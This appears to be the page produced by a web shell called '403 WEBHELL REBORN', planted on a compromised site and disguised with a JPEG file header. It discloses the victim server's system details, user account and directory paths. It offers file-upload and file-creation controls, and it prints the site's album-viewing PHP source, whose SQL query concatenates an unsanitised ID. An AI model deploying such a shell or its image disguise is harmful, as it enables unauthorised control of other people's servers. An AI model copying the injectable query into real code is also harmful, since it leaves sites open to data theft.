ÿØÿà JFIF  ` ` ÿþš 403 WEBHELL REBORN
403 WEBHELL REBORN
Server : Apache/2
System : Linux vps.phamthanh.local 3.10.0-1160.102.1.el7.x86_64 #1 SMP Tue Oct 17 15:42:21 UTC 2023 x86_64
User : benhviencoc7 ( 1008)
PHP Version : 5.6.40
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/benhviencoc7/public_html/modules/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Buat Folder Baru:
Buat File Baru:

Current File : /home/benhviencoc7/public_html/modules/AL_ViewAlbum.php
<?php

/*----------------------------------------*\
|             Copyright © C-ILY            | 
|            Phone: 0983.998.994           |
|             Y!m: notepad.html            |
|         Email: truongpv87@gmail.com      |
\*----------------------------------------*/

define('CILY',true);
//* main.html BEGIN: Album Tiêu điểm *//

       $view_album = @mysql_fetch_array(@mysql_query("SELECT a.*, c.*, c.id AS cid, a.id AS aid FROM cily_album as a JOIN cily_cats as c ON(a.album_cat = c.id) WHERE a.id = ".$w3c->rewrite_id));  

            $w3c->assign(
                    array(  
                        'VAlb_name' => $view_album['album_name'],
                        'VAlb_time' => formatTime($view_album['album_time'],1),
                        'VAlb_img' => $view_album['album_image'],
                        'VAlb_fullimg' => $view_album['album_fullimg'],
                    )); 

       $listImages = explode(',', $view_album['attach_image']);

                    $demhinhanh = '1';
                    foreach($listImages as $imgUrl){
                        if($imgUrl){
                            $thumb = explode('/', $imgUrl);
                            $thumb[count($thumb) - 1] = 'thumbs-' . $thumb[count($thumb) - 1];
                            $w3c->assign(
                                array(
                                    'att_image' => $imgUrl,
                                    'att_thumb' => implode('/', $thumb)
                                )
                            );
                            $w3c->parse('show_album');    
                        $demhinhanh++;                      
                        }
                    }

                    foreach($listImages as $imgUrl1){
                        if($imgUrl1){
                            $thumb1 = explode('/', $imgUrl1);
                            $thumb1[count($thumb1) - 1] = 'thumbs-' . $thumb1[count($thumb1) - 1];
                            $w3c->assign(
                                array(
                                    'att_image1' => $imgUrl1,
                                    'att_thumb1' => implode('/', $thumb1)
                                )
                            );
                            $w3c->parse('show_album1');                      
                        }
                    }
				 $w3c->assign('cat_name', $this_cat['cat_name']);
				$w3c->assign('lscat_image', $this_cat['cat_img']);
//* main.html END: Album Tiêu điểm *//

Anon7 - 2021